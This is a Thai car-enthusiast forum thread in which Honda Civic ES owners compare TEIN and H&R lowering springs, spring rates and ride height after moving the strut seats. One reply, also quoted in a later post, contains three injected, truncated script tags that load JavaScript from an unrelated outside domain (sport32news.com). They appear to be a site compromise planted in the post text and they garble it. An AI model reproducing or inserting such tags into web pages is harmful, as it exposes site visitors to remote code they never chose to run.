ตอบ
der1


เข้าร่วม: 26 สิงหา 2009
ตอบ: 309

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 305
ศุกร์, 9 กรกฎา 2010 17:01 - เลื่อนเบ้า+สปริงโหลด
ตอนนี้ es ผมเลื่อนเบ้ามันจะเตี้ยลง 0.5นิ้ว ถ้าผมใส่สปิงใหลดแล้ว เท่ากับ เลื่อนเบ้า0.5+สปิงโหลดประมาณ1.5 เท่ากับ 2 นิ้วใช่ไหมครับ แล้ว TEIN VS H&R มีข้อแตกต่างกันอย่างไร ใครนุ่มใครหนึบ ใครเตี้ยกว่ากัน ต่างกันประมาณเทาไร (ไม่ใช่น้องๆ SL นะ สปิงโหลดนะพี่) พี่ๆช่วยชี้แนะด้วยครับ
ได้รับคำขอบคุณจาก: nu_es_05 
nuengES02


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 ธันวา 2009
ตอบ: 824

Guru ES
Guru ES

ได้รับคำขอบคุณ: 668
ให้คำขอบคุณ: 373

ที่อยู่: เชียงใหม่คับ
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 9 กรกฎา 2010 19:12 - เลื่อนเบ้า+สปริงโหลด
รอผู้รู้คับ
ได้รับคำขอบคุณจาก: nu_es_05 
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
ศุกร์, 9 กรกฎา 2010 19:41 - เลื่อนเบ้า+สปริงโหลด
H&R หลังจะต่ำ หน้าจะลอย นะครับ ค่อนข้างนุ่ม
วันนี้ไปเปลี่ยยาง (215/45/17) + ปรับแคมเบอร์ หลังสอดได้ 1 นิ้วมือ ส่วนหน้าเกือบ 2 นิ้วมือครับ
ได้รับคำขอบคุณจาก: hikaru_kung  nu_es_05 
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 10 กรกฎา 2010 10:24 - เลื่อนเบ้า+สปริงโหลด
ผมใช่ TEIN S-Tech อยู่ครับเลื่อนเบ้าแล้วครับ หน้าพอดีซุ้มครับหลัง ประมาณ 1นิ้วสอดครับ นุ่มดีครับ ส่วน H&R เพื่อนผมใช้อยู่ครับแต่ว่ามันเปลี่ยนโช๊คด้วยน่ะครับ อมซุ่มพอดีหน้าหลังครับ แต่มันบอกว่าเวลาเลี้ยวสุดจะติดบังโคลนล้อครับ ไงรอผู้รู้ท่านอื่นมาช่วยน่ะครับ
ได้รับคำขอบคุณจาก: tokykung  honeybeex7  hikaru_kung  nu_es_05 
der1


เข้าร่วม: 26 สิงหา 2009
ตอบ: 309

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 190
ให้คำขอบคุณ: 305
อาทิตย์, 11 กรกฎา 2010 14:43 - เลื่อนเบ้า+สปริงโหลด
ขอบคุณครับ อยากได้อีก
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 11 กรกฎา 2010 16:17 - เลื่อนเบ้า+สปริงโหลด
เก็บข้อมูล
Shoke


ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator
Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 11 กรกฎา 2010 20:39 - เลื่อนเบ้า+สปริงโหลด
der1 พิมพ์ว่า:
ขอบคุณครับ อยากได้อีก


อยากได้ข้อมูลอีกต้องค้นหาครับ ลองดูกระทู้เก่าก่อน

ข้อมูล สปริงโหลด Tein vs H&R
ได้รับคำขอบคุณจาก: jk2475  Rangsit 33  honeybeex7  nu_es_05 
นุ_ES


ชื่อเล่น: นุ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 267

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 288
ให้คำขอบคุณ: 813

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 12 กรกฎา 2010 18:11 - เลื่อนเบ้า+สปริงโหลด
ข้อมูลค่าของสปริงที่หลายๆ ท่านรวบรวมไว้

STD ES 1.7 F 2.38 R 4.78

TEIN S-Tech F 2.6 R 4.4

NF210 F 2.4 R 4.9

EP3 F 4.6 R 7.5

DC5 F 3.7 R 7.4
ได้รับคำขอบคุณจาก: honeybeex7  hikaru_kung  nu_es_05  alit 
moshi


ชื่อเล่น: นก

เข้าร่วม: 28 สิงหา 2009
ตอบ: 264

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 126
ให้คำขอบคุณ: 8

ที่อยู่: บางกรวย
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 13 กรกฎา 2010 12:25 - เลื่อนเบ้า+สปริงโหลด
เก็บข้อมูล
ได้รับคำขอบคุณจาก: nu_es_05 
deleteuser





ผู้มาเยือน



อังคาร, 13 กรกฎา 2010 13:53 - เลื่อนเบ้า+สปริงโหลด
เลื่อนเบ้าเป็นไงคับ แนะนำหน่อยครับ ประมาณว่าอยากเตี้ยบ้างจัง
Doraeman


เข้าร่วม: 12 ตุลา 2009
ตอบ: 209

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 277
ให้คำขอบคุณ: 2583

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 13 กรกฎา 2010 17:25 - เลื่อนเบ้า+สปริงโหลด
นุ_ES พิมพ์ว่า:
ข้อมูลค่าของสปริงที่หลายๆ ท่านรวบรวมไว้

STD ES 1.7 F 2.38 R 4.78

TEIN S-Tech F 2.6 R 4.4

NF210 F 2.4 R 4.9

EP3 F 4.6 R 7.5

DC5 F 3.7 R 7.4



อ๊ะ ค่า K ของสปริงหลัง TEIN น้อยกว่า STD อีกเหรอครับเนี่ย ผมเพิ่งจะทราบ

อย่างงี้ถ้านั่งข้างหลังกันหลาย ๆ คน ตูดย้อยเลยดิครับเนี่ย


ได้รับคำขอบคุณจาก: nu_es_05 
Black mOOn


ชื่อเล่น: โจ้

เข้าร่วม: 02 ตุลา 2008
ตอบ: 956

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2334
ให้คำขอบคุณ: 302

ที่อยู่: Rama7~ Bangkok
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 13 กรกฎา 2010 17:59 - เลื่อนเบ้า+สปริงโหลด
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 13 กรกฎา 2010 18:03 - เลื่อนเบ้า+สปริงโหลด
Doraeman พิมพ์ว่า:
นุ_ES พิมพ์ว่า:
ข้อมูลค่าของสปริงที่หลายๆ ท่านรวบรวมไว้

STD ES 1.7 F 2.38 R 4.78

TEIN S-Tech F 2.6 R 4.4

NF210 F 2.4 R 4.9

EP3 F 4.6 R 7.5

DC5 F 3.7 R 7.4



อ๊ะ ค่า K ของสปริงหลัง TEIN น้อยกว่า STD อีกเหรอครับเนี่ย ผมเพิ่งจะทราบ

อย่างงี้ถ้านั่งข้างหลังกันหลาย ๆ คน ตูดย้อยเลยดิครับเนี่ย





ใช่แล้วครับ ผมโดนมาแล้ว หลัง4คน เหมือนรถติดแก๊สเลยครับ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ พูดอะไรก็ไม่ได้ครับ ผบ.ใหญ่ๆกันทั้งนั้นครับ
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 13 กรกฎา 2010 18:44 - เลื่อนเบ้า+สปริงโหลด
H&R ตอนพี่ผมใส่ ซุ้มหน้าหลังเหลือเท่ากันเลยครับ เตี้ยแบบพอดีเลย แต่เด้งไปหน่อยถ้าไม่ได้อัดน้ำมัน
ถ้าเลื่อนเบ้าหน้านั่งหลายๆคนไม่รู้ว่าตอนเลี้ยวจะติดซุ้มป่าว

ของผม NF210 เลื่อนเบ้าหน้าแล้ว พอดีเลยไม่เตี้ยมาก
l3estZ


เข้าร่วม: 01 ตุลา 2008
ตอบ: 385

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 430
ให้คำขอบคุณ: 78

ที่อยู่: Rama II
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 13 กรกฎา 2010 20:53 - เลื่อนเบ้า+สปริงโหลด
Eibach เลื่อนเบ้าหน้า หน้าทิ่มตูดโด่ง ครับ
parman


ชื่อเล่น: สอง

เข้าร่วม: 12 กุมภา 2009
ตอบ: 262

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 230
ให้คำขอบคุณ: 655

ที่อยู่: saraburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 13 กรกฎา 2010 23:07 - เลื่อนเบ้า+สปริงโหลด
อยากทราบวิธีเลื่อนเบ้าอ่ะครับ..ทำไง
ของผมยังครับ
เก็บข้อมูลด้วยครับ..
ได้รับคำขอบคุณจาก: nu_es_05 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พุธ, 14 กรกฎา 2010 09:09 - เลื่อนเบ้า+สปริงโหลด
H&R + เลื่อนเบ้า ต้องอัดโช๊คหนึบ ๆ หน่อยไม่งั้นมีสีซุ้มหน้าแน่นอนครับ
และถ้าจับกับล้อ 16 ด้วยไปไหนลำบากเลยครับ แปะพื้นเลย
ได้รับคำขอบคุณจาก: nu_es_05 
honeybeex7


เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 14 กรกฎา 2010 11:16 - เลื่อนเบ้า+สปริงโหลด
Saka พิมพ์ว่า:
H&R + เลื่อนเบ้า ต้องอัดโช๊คหนึบ ๆ หน่อยไม่งั้นมีสีซุ้มหน้าแน่นอนครับ
และถ้าจับกับล้อ 16 ด้วยไปไหนลำบากเลยครับ แปะพื้นเลย



ถ้างั้นถ้า H&R จับกะล้อ 15 ล่ะ จะเวิกไหม เวิกกว่าจับกะ16ป่าว
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 28 กรกฎา 2011 21:48 - เลื่อนเบ้า+สปริงโหลด
CHAMP_ME16 พิมพ์ว่า:


ใช่แล้วครับ ผมโดนมาแล้ว หลัง4คน เหมือนรถติดแก๊สเลยครับ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ พูดอะไรก็ไม่ได้ครับ ผบ.ใหญ่ๆกันทั้งนั้นครับ
แล้วคนนั่งท้ายจะู้รู้สึกนุ่มกว่าเดิมไหมอ่ะครับ
top_es


เข้าร่วม: 01 กุมภา 2010
ตอบ: 842

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 40

ปี: 2005
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 29 กรกฎา 2011 10:06 - เลื่อนเบ้า+สปริงโหลด
นี่เลยคับ ทำมาหมาดๆ ร้านพี่ใหม่ได้ 2 3 สัปดาห์แล้ว

โช๊คเดิมไม่เลื่อนเบ้า อัดน้ำมันอย่างเดี่ยว หลังรองสเปเซอร์ 0.5 นิ้ว ล้อเดิม ยาง195/60/15

filling
+ไม่ต่างจากเดิมมาก เข้าโค้งมันใจขึ้น แต่ถ้าเจอถนน ตจว ช่วงล่างจะส่งความรู้สึกกระแทกนิดๆ มาชัดเจนกว่าเดิมหน่อยคับ

ปล. ทั้งหมดจากความรู้สึกล้วนๆคับ


เพื่ออยากดูหลายๆมุมครับ
http://www.civicesgroup.com/forum/topic21907-90


Attached File :
เลื่อนเบ้า+สปริงโหลด
ได้รับคำขอบคุณจาก: Phetcharat 
Ball Featuring


ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ที่อยู่: พิษณุโลกBIG C
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 29 กรกฎา 2011 10:09 - เลื่อนเบ้า+สปริงโหลด
ล้อหลังลองใส่สตัดปรับเกลียวเลย จะได้ปรับสูง-ต่ำได้ จะได้ไม่ต้องมากดหน้า-ดีดตูด
wangyu


ชื่อเล่น: เอ๊ช

เข้าร่วม: 17 มิถุนา 2010
ตอบ: 7619

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6468
ให้คำขอบคุณ: 7442

ที่อยู่: ลำผักชี,หนองจอก,ลาดกระบัง,มาบตาพุด ระยอง
ปี: 2005
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 29 กรกฎา 2011 20:44 - เลื่อนเบ้า+สปริงโหลด
Tein ss สุดยอด




aeung_ES


ชื่อเล่น: อึ่งคัฟ

เข้าร่วม: 12 มกรา 2011
ตอบ: 417

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 68
ให้คำขอบคุณ: 63

ที่อยู่: Lampang & Saraburi
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 30 กรกฎา 2011 19:52 - เลื่อนเบ้า+สปริงโหลด
wangyu พิมพ์ว่า:
Tein ss สุดยอด







ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.